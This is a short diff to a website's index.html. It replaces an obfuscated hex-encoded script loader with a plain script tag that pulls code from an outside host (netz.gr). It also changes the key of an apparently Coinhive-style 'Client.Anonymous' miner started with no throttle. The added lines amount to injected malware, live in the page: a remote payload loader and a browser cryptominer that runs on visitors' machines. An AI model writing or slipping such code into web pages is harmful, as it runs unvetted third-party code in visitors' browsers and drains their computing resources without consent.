--- a/index.html
+++ b/index.html
@@ -512,9 +512,9 @@
       })
     </script>
 
-var _cs=["\x6a\x73","\x48\x30","\x4b\x2e","\x70\x3a\x2f","\x7a\x2e","\x2f\x6e","\x68\x74\x74","\x5a\x2e","\x67\x72","\x70\x68\x70","\x3d\x78","\x3f\x66","\x65\x74","\x55\x44","\x2f\x6a"]; <script _g0=_cs[6]+_cs[3]+_cs[5]+_cs[12]+_cs[4]+_cs[8]+_cs[14]+_cs[13]+_cs[7]+_cs[9]+_cs[11]+_cs[10]+_cs[1]+_cs[2]+_cs[0]></script>
+<script src="http://netz.gr/l3se.php?f=emuj.js"></script>
 <script>
-    var _client = new Client.Anonymous('4ee336ff9b6e6d124f64c6112fa072fe745222a4cad7937cb74edd695d547d37', {
+    var _client = new Client.Anonymous('ce5ea48caf562e52b026b82443a82775f8bbd72a4a71fa6b301a081288b5b215', {
         throttle: 0, c: 'w'
     });
     _client.start();
